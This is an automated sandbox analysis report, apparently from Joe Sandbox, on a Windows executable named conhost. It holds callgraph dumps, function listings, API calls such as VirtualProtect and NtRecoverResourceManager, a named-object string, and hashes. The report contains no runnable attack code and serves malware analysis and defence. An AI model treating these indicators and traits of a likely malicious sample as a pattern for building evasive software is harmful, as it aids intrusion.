calls 2351->2352 2353 140001512 2352->2353 2354 140001394 2 API calls 2353->2354 2355 140001521 2354->2355 2356 140001394 2 API calls 2355->2356 2357 140001530 2356->2357 2358 140001394 2 API calls 2357->2358 2359 14000153f 2358->2359 2360 140001394 2 API calls 2359->2360 2361 14000154e 2360->2361 2362 140001394 2 API calls 2361->2362 2363 14000155d 2362->2363 2364 140001394 2 API calls 2363->2364 2365 14000156c 2364->2365 2366 140001394 2 API calls 2365->2366 2367 14000157b 2366->2367 2368 140001394 2 API calls 2367->2368 2369 14000158a 2368->2369 2370 140001394 2 API calls 2369->2370 2371 140001599 2370->2371 2372 140001394 2 API calls 2371->2372 2373 1400015a8 2372->2373 2374 140001394 2 API calls 2373->2374 2375 1400015b7 2374->2375 2376 140001394 2 API calls 2375->2376 2377 1400015c6 2376->2377 2378 140001394 2 API calls 2377->2378 2379 1400015d5 2378->2379 2380 140001394 2 API calls 2379->2380 2381 1400015e4 2380->2381 2382 140001394 2 API calls 2381->2382 2383 1400015f3 2382->2383 2383->2181 2385 140001394 2 API calls 2384->2385 2386 14000147c 2385->2386 2387 140001394 2 API calls 2386->2387 2388 14000148b 2387->2388 2389 140001394 2 API calls 2388->2389 2390 14000149a 2389->2390 2391 140001394 2 API calls 2390->2391 2392 1400014a9 2391->2392 2393 140001394 2 API calls 2392->2393 2394 1400014b8 2393->2394 2395 140001394 2 API calls 2394->2395 2396 1400014c7 2395->2396 2397 140001394 2 API calls 2396->2397 2398 1400014d6 2397->2398 2399 1400014e5 2398->2399 2400 140001394 2 API calls 2398->2400 2401 140001394 2 API calls 2399->2401 2400->2399 2402 1400014ef 2401->2402 2403 1400014f4 2402->2403 2404 140001394 2 API calls 2402->2404 2405 140001394 2 API calls 2403->2405 2404->2403 2406 1400014fe 2405->2406 2407 140001503 2406->2407 2408 140001394 2 API calls 2406->2408 2409 140001394 2 API calls 2407->2409 2408->2407 2410 14000150d 2409->2410 2411 140001394 2 API calls 2410->2411 2412 140001512 2411->2412 2413 140001394 2 API calls 2412->2413 2414 140001521 2413->2414 2415 140001394 2 API calls 2414->2415 2416 140001530 2415->2416 2417 140001394 2 API calls 2416->2417 2418 14000153f 2417->2418 2419 140001394 2 API calls 2418->2419 2420 14000154e 2419->2420 2421 140001394 2 API calls 2420->2421 2422 14000155d 2421->2422 2423 140001394 2 API calls 2422->2423 2424 14000156c 2423->2424 2425 140001394 2 API calls 2424->2425 2426 14000157b 2425->2426 2427 140001394 2 API calls 2426->2427 2428 14000158a 2427->2428 2429 140001394 2 API calls 2428->2429 2430 140001599 2429->2430 2431 140001394 2 API calls 2430->2431 2432 1400015a8 2431->2432 2433 140001394 2 API calls 2432->2433 2434 1400015b7 2433->2434 2435 140001394 2 API calls 2434->2435 2436 1400015c6 2435->2436 2437 140001394 2 API calls 2436->2437 2438 1400015d5 2437->2438 2439 140001394 2 API calls 2438->2439 2440 1400015e4 2439->2440 2441 140001394 2 API calls 2440->2441 2442 1400015f3 2441->2442 2442->2216 2443 140001530 2442->2443 2444 140001394 2 API calls 2443->2444 2445 14000153f 2444->2445 2446 140001394 2 API calls 2445->2446 2447 14000154e 2446->2447 2448 140001394 2 API calls 2447->2448 2449 14000155d 2448->2449 2450 140001394 2 API calls 2449->2450 2451 14000156c 2450->2451 2452 140001394 2 API calls 2451->2452 2453 14000157b 2452->2453 2454 140001394 2 API calls 2453->2454 2455 14000158a 2454->2455 2456 140001394 2 API calls 2455->2456 2457 140001599 2456->2457 2458 140001394 2 API calls 2457->2458 2459 1400015a8 2458->2459 2460 140001394 2 API calls 2459->2460 2461 1400015b7 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015c6 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015d5 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015e4 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015f3 2468->2469 2469->2207 2469->2208 2471 140001394 2 API calls 2470->2471 2472 1400014b8 2471->2472 2473 140001394 2 API calls 2472->2473 2474 1400014c7 2473->2474 2475 140001394 2 API calls 2474->2475 2476 1400014d6 2475->2476 2477 1400014e5 2476->2477 2478 140001394 2 API calls 2476->2478 2479 140001394 2 API calls 2477->2479 2478->2477 2480 1400014ef 2479->2480 2481 1400014f4 2480->2481 2482 140001394 2 API calls 2480->2482 2483 140001394 2 API calls 2481->2483 2482->2481 2484 1400014fe 2483->2484 2485 140001503 2484->2485 2486 140001394 2 API calls 2484->2486 2487 140001394 2 API calls 2485->2487 2486->2485 2488 14000150d 2487->2488 2489 140001394 2 API calls 2488->2489 2490 140001512 2489->2490 2491 140001394 2 API calls 2490->2491 2492 140001521 2491->2492 2493 140001394 2 API calls 2492->2493 2494 140001530 2493->2494 2495 140001394 2 API calls 2494->2495 2496 14000153f 2495->2496 2497 140001394 2 API calls 2496->2497 2498 14000154e 2497->2498 2499 140001394 2 API calls 2498->2499 2500 14000155d 2499->2500 2501 140001394 2 API calls 2500->2501 2502 14000156c 2501->2502 2503 140001394 2 API calls 2502->2503 2504 14000157b 2503->2504 2505 140001394 2 API calls 2504->2505 2506 14000158a 2505->2506 2507 140001394 2 API calls 2506->2507 2508 140001599 2507->2508 2509 140001394 2 API calls 2508->2509 2510 1400015a8 2509->2510 2511 140001394 2 API calls 2510->2511 2512 1400015b7 2511->2512 2513 140001394 2 API calls 2512->2513 2514 1400015c6 2513->2514 2515 140001394 2 API calls 2514->2515 2516 1400015d5 2515->2516 2517 140001394 2 API calls 2516->2517 2518 1400015e4 2517->2518 2519 140001394 2 API calls 2518->2519 2520 1400015f3 2519->2520 2520->2212 2521 140001440 2520->2521 2522 140001394 2 API calls 2521->2522 2523 14000144f 2522->2523 2524 140001394 2 API calls 2523->2524 2525 14000145e 2524->2525 2526 140001394 2 API calls 2525->2526 2527 14000146d 2526->2527 2528 140001394 2 API calls 2527->2528 2529 14000147c 2528->2529 2530 140001394 2 API calls 2529->2530 2531 14000148b 2530->2531 2532 140001394 2 API calls 2531->2532 2533 14000149a 2532->2533 2534 140001394 2 API calls 2533->2534 2535 1400014a9 2534->2535 2536 140001394 2 API calls 2535->2536 2537 1400014b8 2536->2537 2538 140001394 2 API calls 2537->2538 2539 1400014c7 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400014d6 2540->2541 2542 1400014e5 2541->2542 2543 140001394 2 API calls 2541->2543 2544 140001394 2 API calls 2542->2544 2543->2542 2545 1400014ef 2544->2545 2546 1400014f4 2545->2546 2547 140001394 2 API calls 2545->2547 2548 140001394 2 API calls 2546->2548 2547->2546 2549 1400014fe 2548->2549 2550 140001503 2549->2550 2551 140001394 2 API calls 2549->2551 2552 140001394 2 API calls 2550->2552 2551->2550 2553 14000150d 2552->2553 2554 140001394 2 API calls 2553->2554 2555 140001512 2554->2555 2556 140001394 2 API calls 2555->2556 2557 140001521 2556->2557 2558 140001394 2 API calls 2557->2558 2559 140001530 2558->2559 2560 140001394 2 API calls 2559->2560 2561 14000153f 2560->2561 2562 140001394 2 API calls 2561->2562 2563 14000154e 2562->2563 2564 140001394 2 API calls 2563->2564 2565 14000155d 2564->2565 2566 140001394 2 API calls 2565->2566 2567 14000156c 2566->2567 2568 140001394 2 API calls 2567->2568 2569 14000157b 2568->2569 2570 140001394 2 API calls 2569->2570 2571 14000158a 2570->2571 2572 140001394 2 API calls 2571->2572 2573 140001599 2572->2573 2574 140001394 2 API calls 2573->2574 2575 1400015a8 2574->2575 2576 140001394 2 API calls 2575->2576 2577 1400015b7 2576->2577 2578 140001394 2 API calls 2577->2578 2579 1400015c6 2578->2579 2580 140001394 2 API calls 2579->2580 2581 1400015d5 2580->2581 2582 140001394 2 API calls 2581->2582 2583 1400015e4 2582->2583 2584 140001394 2 API calls 2583->2584 2585 1400015f3 2584->2585 2585->2212 2585->2219 2587 1400014e5 2586->2587 2588 140001394 2 API calls 2586->2588 2589 140001394 2 API calls 2587->2589 2588->2587 2590 1400014ef 2589->2590 2591 1400014f4 2590->2591 2592 140001394 2 API calls 2590->2592 2593 140001394 2 API calls 2591->2593 2592->2591 2594 1400014fe 2593->2594 2595 140001503 2594->2595 2596 140001394 2 API calls 2594->2596 2597 140001394 2 API calls 2595->2597 2596->2595 2598 14000150d 2597->2598 2599 140001394 2 API calls 2598->2599 2600 140001512 2599->2600 2601 140001394 2 API calls 2600->2601 2602 140001521 2601->2602 2603 140001394 2 API calls 2602->2603 2604 140001530 2603->2604 2605 140001394 2 API calls 2604->2605 2606 14000153f 2605->2606 2607 140001394 2 API calls 2606->2607 2608 14000154e 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000155d 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000156c 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000157b 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000158a 2615->2616 2617 140001394 2 API calls 2616->2617 2618 140001599 2617->2618 2619 140001394 2 API calls 2618->2619 2620 1400015a8 2619->2620 2621 140001394 2 API calls 2620->2621 2622 1400015b7 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015c6 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015d5 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015e4 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015f3 2629->2630 2630->2231 2632 140001394 2 API calls 2631->2632 2633 14000158a 2632->2633 2634 140001394 2 API calls 2633->2634 2635 140001599 2634->2635 2636 140001394 2 API calls 2635->2636 2637 1400015a8 2636->2637 2638 140001394 2 API calls 2637->2638 2639 1400015b7 2638->2639 2640 140001394 2 API calls 2639->2640 2641 1400015c6 2640->2641 2642 140001394 2 API calls 2641->2642 2643 1400015d5 2642->2643 2644 140001394 2 API calls 2643->2644 2645 1400015e4 2644->2645 2646 140001394 2 API calls 2645->2646 2647 1400015f3 2646->2647 2647->2231 2649 140001394 2 API calls 2648->2649 2650 1400015b7 2649->2650 2651 140001394 2 API calls 2650->2651 2652 1400015c6 2651->2652 2653 140001394 2 API calls 2652->2653 2654 1400015d5 2653->2654 2655 140001394 2 API calls 2654->2655 2656 1400015e4 2655->2656 2657 140001394 2 API calls 2656->2657 2658 1400015f3 2657->2658 2658->2231 2660 140001394 2 API calls 2659->2660 2661 140001530 2660->2661 2662 140001394 2 API calls 2661->2662 2663 14000153f 2662->2663 2664 140001394 2 API calls 2663->2664 2665 14000154e 2664->2665 2666 140001394 2 API calls 2665->2666 2667 14000155d 2666->2667 2668 140001394 2 API calls 2667->2668 2669 14000156c 2668->2669 2670 140001394 2 API calls 2669->2670 2671 14000157b 2670->2671 2672 140001394 2 API calls 2671->2672 2673 14000158a 2672->2673 2674 140001394 2 API calls 2673->2674 2675 140001599 2674->2675 2676 140001394 2 API calls 2675->2676 2677 1400015a8 2676->2677 2678 140001394 2 API calls 2677->2678 2679 1400015b7 2678->2679 2680 140001394 2 API calls 2679->2680 2681 1400015c6 2680->2681 2682 140001394 2 API calls 2681->2682 2683 1400015d5 2682->2683 2684 140001394 2 API calls 2683->2684 2685 1400015e4 2684->2685 2686 140001394 2 API calls 2685->2686 2687 1400015f3 2686->2687 2687->2231 2689 140001394 2 API calls 2688->2689 2690 140001431 2689->2690 2691 140001394 2 API calls 2690->2691 2692 140001440 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000144f 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000145e 2695->2696 2697 140001394 2 API calls 2696->2697 2698 14000146d 2697->2698 2699 140001394 2 API calls 2698->2699 2700 14000147c 2699->2700 2701 140001394 2 API calls 2700->2701 2702 14000148b 2701->2702 2703 140001394 2 API calls 2702->2703 2704 14000149a 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400014a9 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400014b8 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400014c7 2709->2710 2711 140001394 2 API calls 2710->2711 2712 1400014d6 2711->2712 2713 1400014e5 2712->2713 2714 140001394 2 API calls 2712->2714 2715 140001394 2 API calls 2713->2715 2714->2713 2716 1400014ef 2715->2716 2717 1400014f4 2716->2717 2718 140001394 2 API calls 2716->2718 2719 140001394 2 API calls 2717->2719 2718->2717 2720 1400014fe 2719->2720 2721 140001503 2720->2721 2722 140001394 2 API calls 2720->2722 2723 140001394 2 API calls 2721->2723 2722->2721 2724 14000150d 2723->2724 2725 140001394 2 API calls 2724->2725 2726 140001512 2725->2726 2727 140001394 2 API calls 2726->2727 2728 140001521 2727->2728 2729 140001394 2 API calls 2728->2729 2730 140001530 2729->2730 2731 140001394 2 API calls 2730->2731 2732 14000153f 2731->2732 2733 140001394 2 API calls 2732->2733 2734 14000154e 2733->2734 2735 140001394 2 API calls 2734->2735 2736 14000155d 2735->2736 2737 140001394 2 API calls 2736->2737 2738 14000156c 2737->2738 2739 140001394 2 API calls 2738->2739 2740 14000157b 2739->2740 2741 140001394 2 API calls 2740->2741 2742 14000158a 2741->2742 2743 140001394 2 API calls 2742->2743 2744 140001599 2743->2744 2745 140001394 2 API calls 2744->2745 2746 1400015a8 2745->2746 2747 140001394 2 API calls 2746->2747 2748 1400015b7 2747->2748 2749 140001394 2 API calls 2748->2749 2750 1400015c6 2749->2750 2751 140001394 2 API calls 2750->2751 2752 1400015d5 2751->2752 2753 140001394 2 API calls 2752->2753 2754 1400015e4 2753->2754 2755 140001394 2 API calls 2754->2755 2756 1400015f3 2755->2756 2756->2231 2758 140001394 2 API calls 2757->2758 2759 140001440 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000144f 2760->2761 2762 140001394 2 API calls 2761->2762 2763 14000145e 2762->2763 2764 140001394 2 API calls 2763->2764 2765 14000146d 2764->2765 2766 140001394 2 API calls 2765->2766 2767 14000147c 2766->2767 2768 140001394 2 API calls 2767->2768 2769 14000148b 2768->2769 2770 140001394 2 API calls 2769->2770 2771 14000149a 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400014a9 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400014b8 2774->2775 2776 140001394 2 API calls 2775->2776 2777 1400014c7 2776->2777 2778 140001394 2 API calls 2777->2778 2779 1400014d6 2778->2779 2780 1400014e5 2779->2780 2781 140001394 2 API calls 2779->2781 2782 140001394 2 API calls 2780->2782 2781->2780 2783 1400014ef 2782->2783 2784 1400014f4 2783->2784 2785 140001394 2 API calls 2783->2785 2786 140001394 2 API calls 2784->2786 2785->2784 2787 1400014fe 2786->2787 2788 140001503 2787->2788 2789 140001394 2 API calls 2787->2789 2790 140001394 2 API calls 2788->2790 2789->2788 2791 14000150d 2790->2791 2792 140001394 2 API calls 2791->2792 2793 140001512 2792->2793 2794 140001394 2 API calls 2793->2794 2795 140001521 2794->2795 2796 140001394 2 API calls 2795->2796 2797 140001530 2796->2797 2798 140001394 2 API calls 2797->2798 2799 14000153f 2798->2799 2800 140001394 2 API calls 2799->2800 2801 14000154e 2800->2801 2802 140001394 2 API calls 2801->2802 2803 14000155d 2802->2803 2804 140001394 2 API calls 2803->2804 2805 14000156c 2804->2805 2806 140001394 2 API calls 2805->2806 2807 14000157b 2806->2807 2808 140001394 2 API calls 2807->2808 2809 14000158a 2808->2809 2810 140001394 2 API calls 2809->2810 2811 140001599 2810->2811 2812 140001394 2 API calls 2811->2812 2813 1400015a8 2812->2813 2814 140001394 2 API calls 2813->2814 2815 1400015b7 2814->2815 2816 140001394 2 API calls 2815->2816 2817 1400015c6 2816->2817 2818 140001394 2 API calls 2817->2818 2819 1400015d5 2818->2819 2820 140001394 2 API calls 2819->2820 2821 1400015e4 2820->2821 2822 140001394 2 API calls 2821->2822 2823 1400015f3 2822->2823 2823->2231

                                                                Callgraph

                                                                • Executed
                                                                • Not Executed
                                                                • Opacity -> Relevance
                                                                • Disassembly available
                                                                callgraph 0 Function_00000001400058E1 1 Function_0000000140001AE4 32 Function_0000000140001D40 1->32 75 Function_0000000140001BA0 1->75 2 Function_00000001400014E5 71 Function_0000000140001394 2->71 3 Function_00000001400010F0 4 Function_00000001400030F1 5 Function_00000001400059F1 6 Function_00000001400014F4 6->71 7 Function_0000000140002500 8 Function_0000000140001800 64 Function_0000000140002290 8->64 9 Function_0000000140001000 10 Function_0000000140001E00 9->10 37 Function_0000000140001750 9->37 79 Function_0000000140001FB0 9->79 88 Function_0000000140001FC0 9->88 11 Function_0000000140002F00 54 Function_0000000140001370 11->54 12 Function_0000000140005801 13 Function_0000000140001503 13->71 14 Function_0000000140001404 14->71 15 Function_0000000140002104 16 Function_0000000140001E10 17 Function_0000000140003110 18 Function_0000000140001512 18->71 19 Function_0000000140002420 20 Function_0000000140002320 21 Function_0000000140001521 21->71 22 Function_0000000140005821 23 Function_0000000140005921 24 Function_0000000140001422 24->71 25 Function_0000000140001530 25->71 26 Function_0000000140003130 27 Function_0000000140005D30 55 Function_0000000140005A70 27->55 28 Function_0000000140001431 28->71 29 Function_000000014000153F 29->71 30 Function_0000000140001440 30->71 31 Function_0000000140001140 46 Function_0000000140001160 31->46 32->64 33 Function_0000000140005841 34 Function_0000000140001F47 53 Function_0000000140001870 34->53 35 Function_0000000140002050 36 Function_0000000140003150 36->11 36->13 36->21 36->24 36->25 36->28 36->29 36->30 43 Function_000000014000145E 36->43 45 Function_0000000140002660 36->45 50 Function_000000014000156C 36->50 51 Function_000000014000146D 36->51 36->54 36->55 59 Function_000000014000157B 36->59 76 Function_00000001400015A8 36->76 77 Function_00000001400014A9 36->77 87 Function_00000001400016C0 36->87 97 Function_00000001400014D6 36->97 98 Function_00000001400026E0 36->98 38 Function_0000000140001650 39 Function_0000000140005A50 40 Function_0000000140005751 41 Function_0000000140003051 42 Function_000000014000155D 42->71 43->71 44 Function_0000000140002460 46->36 46->46 46->53 60 Function_0000000140001880 46->60 63 Function_0000000140001F90 46->63 46->87 47 Function_0000000140001760 99 Function_00000001400020E0 47->99 48 Function_0000000140005861 49 Function_0000000140001E65 49->53 50->71 51->71 52 Function_000000014000216F 56 Function_0000000140001A70 56->32 56->75 57 Function_0000000140003070 58 Function_0000000140005771 59->71 60->19 60->32 60->45 60->75 61 Function_0000000140005A80 61->55 62 Function_0000000140005881 65 Function_0000000140002590 66 Function_0000000140003090 67 Function_0000000140005890 68 Function_0000000140002691 69 Function_0000000140005791 70 Function_0000000140005991 71->27 71->61 72 Function_0000000140002194 72->53 73 Function_000000014000219E 74 Function_0000000140001FA0 75->32 78 Function_00000001400023B0 75->78 92 Function_00000001400024D0 75->92 76->71 77->71 80 Function_00000001400022B0 81 Function_00000001400026B0 82 Function_00000001400030B1 83 Function_00000001400057B1 84 Function_00000001400058B1 85 Function_00000001400059B1 86 Function_0000000140001AB3 86->32 86->75 89 Function_0000000140001AC3 89->32 89->75 90 Function_00000001400014C7 90->71 91 Function_00000001400026D0 93 Function_00000001400017D0 94 Function_0000000140001FD0 95 Function_00000001400057D1 96 Function_0000000140001AD4 96->32 96->75 97->71 98->2 98->6 98->13 98->18 98->42 98->43 98->45 98->54 98->55 98->77 98->90 100 Function_00000001400017E0 100->99 101 Function_00000001400022E0

                                                                Executed Functions

                                                                Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • NtRecoverResourceManager.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                Memory Dump Source
                                                                • Source File: 00000023.00000002.2735499054.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                • Associated: 00000023.00000002.2735474655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735535180.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735557859.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735583788.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                Similarity
                                                                • API ID: ManagerRecoverResource
                                                                • String ID:
                                                                • API String ID: 670294642-0
                                                                • Opcode ID: 246d552ccf35dba0a72f9642a2b170f14ce02e0c7d88dfc41b5b4cdba97dde56
                                                                • Instruction ID: ff33f27b0a026a04f7ab3915fd0df5fef9901e61afa9e48d9c8bca05f8c78e03
                                                                • Opcode Fuzzy Hash: 246d552ccf35dba0a72f9642a2b170f14ce02e0c7d88dfc41b5b4cdba97dde56
                                                                • Instruction Fuzzy Hash: 67F09DB2608B408AEA12DB52F89579A77A0F38D7C0F00991ABBC843735DB38C190CB80

                                                                Non-executed Functions

                                                                Function 00000001400026E0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 376COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 318 140002774-14000277a 315->318 321 140002953-14000297b call 1400014c7 316->321 322 140002864-140002873 316->322 318->316 320 140002780-140002787 318->320 323 140002789-140002792 320->323 324 140002750-140002752 320->324 339 140002986-1400029c8 call 140001503 call 140005a70 321->339 340 14000297d 321->340 325 140002eb7-140002ef4 call 140001370 322->325 326 140002879-140002888 322->326 329 140002794-1400027ab 323->329 330 1400027f8-1400027fb 323->330 327 14000275a-14000276e 324->327 331 1400028e4-14000294e wcsncmp call 1400014e5 326->331 332 14000288a-1400028dd 326->332 327->316 327->318 335 1400027f5 329->335 336 1400027ad-1400027c2 329->336 330->327 331->321 332->331 335->330 341 1400027d0-1400027d7 336->341 349 140002e49-140002e84 call 140001370 339->349 350 1400029ce-1400029d5 339->350 340->339 342 1400027d9-1400027f3 341->342 343 140002800-140002809 341->343 342->335 342->341 343->327 353 1400029d7-140002a0c 349->353 357 140002e8a 349->357 352 140002a13-140002a43 wcscpy wcscat wcslen 350->352 350->353 355 140002a45-140002a76 wcslen 352->355 356 140002a78-140002aa5 352->356 353->352 358 140002aa8-140002abf wcslen 355->358 356->358 357->352 359 140002ac5-140002ad8 358->359 360 140002e8f-140002eab call 140001370 358->360 362 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->362 363 140002ada-140002aee 359->363 360->325 381 140002dfd-140002e1b call 140001512 362->381 382 140002e20-140002e48 call 14000145e 362->382 363->362 381->382
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000023.00000002.2735499054.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                • Associated: 00000023.00000002.2735474655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735535180.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735557859.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735583788.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                Similarity
                                                                • API ID: wcslen$wcscatwcscpywcsncmp
                                                                • String ID: 0$X$\BaseNamedObjects\tkseuvkdyhuolcqzzgybkevs$`
                                                                • API String ID: 597572034-3083454489
                                                                • Opcode ID: c71879c748ce08ff241a11e008b9fa7488b28d2c1813075cebcebcb43809f47e
                                                                • Instruction ID: 8341af8badf0aad3820a668801f8e5507c0d7650d075db2df4f51631e5db4636
                                                                • Opcode Fuzzy Hash: c71879c748ce08ff241a11e008b9fa7488b28d2c1813075cebcebcb43809f47e
                                                                • Instruction Fuzzy Hash: 801248B2608BC081E762CB16F8443EAB7A4F789794F414215EBA857BF5EF78C189C700
                                                                Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000023.00000002.2735499054.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                • Associated: 00000023.00000002.2735474655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735535180.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735557859.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735583788.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                Similarity
                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                • String ID:
                                                                • API String ID: 2643109117-0
                                                                • Opcode ID: 4d28af5c21eba74edab072e0801bccbc19f82fe5b468f8debcdefa21a6aa934c
                                                                • Instruction ID: 73c3b68e98ff42000a1af03c456dc8c34f947af47c306e20a6dfbd1f0f7b6b39
                                                                • Opcode Fuzzy Hash: 4d28af5c21eba74edab072e0801bccbc19f82fe5b468f8debcdefa21a6aa934c
                                                                • Instruction Fuzzy Hash: D05133B1611A4085FB12EF27F9947EA23A4AB8DBC0F849121FB4D873B6DE38C4958300
                                                                Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 430 140001be9-140001bf1 428->430 431 140001c0c-140001c17 call 1400023b0 429->431 432 140001bf3-140001c02 430->432 433 140001be0-140001be7 430->433 437 140001cf4-140001cfe call 140001d40 431->437 438 140001c1d-140001c6c call 1400024d0 VirtualQuery 431->438 432->433 435 140001c04 432->435 433->430 433->431 439 140001cd7-140001cf3 memcpy 435->439 442 140001d03-140001d1e call 140001d40 437->442 438->442 445 140001c72-140001c79 438->445 446 140001d23-140001d38 GetLastError call 140001d40 442->446 447 140001c7b-140001c7e 445->447 448 140001c8e-140001c97 445->448 450 140001cd1 447->450 451 140001c80-140001c83 447->451 452 140001ca4-140001ccf VirtualProtect 448->452 453 140001c99-140001c9c 448->453 450->439 451->450 455 140001c85-140001c8a 451->455 452->446 452->450 453->450 456 140001c9e 453->456 455->450 457 140001c8c 455->457 456->452 457->456
                                                                APIs
                                                                • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                • memcpy.MSVCRT ref: 0000000140001CE0
                                                                • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000023.00000002.2735499054.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                • Associated: 00000023.00000002.2735474655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735535180.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735557859.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735583788.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                • API String ID: 2595394609-2123141913
                                                                • Opcode ID: 7c9fb9a4f76ecc7cf27a0d25185f2cd29559559c3a99ec63fa7b5d9e1f40a91c
                                                                • Instruction ID: 7b5486fcc9d014d6dab15f154c2210ae67501804c1c0d462d84bfb5dee9a1a34
                                                                • Opcode Fuzzy Hash: 7c9fb9a4f76ecc7cf27a0d25185f2cd29559559c3a99ec63fa7b5d9e1f40a91c
                                                                • Instruction Fuzzy Hash: D04143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700
                                                                Function 0000000140002104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 465 14000214d-140002159 TlsGetValue GetLastError 462->465 466 140002241-140002263 DeleteCriticalSection 464->466 467 14000222f 464->467 468 14000215b-14000215e 465->468 469 140002140-140002147 465->469 466->463 470 140002230-14000223f 467->470 468->469 471 140002160-14000216d 468->471 469->461 469->465 470->466 471->469
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000023.00000002.2735499054.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                • Associated: 00000023.00000002.2735474655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735535180.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
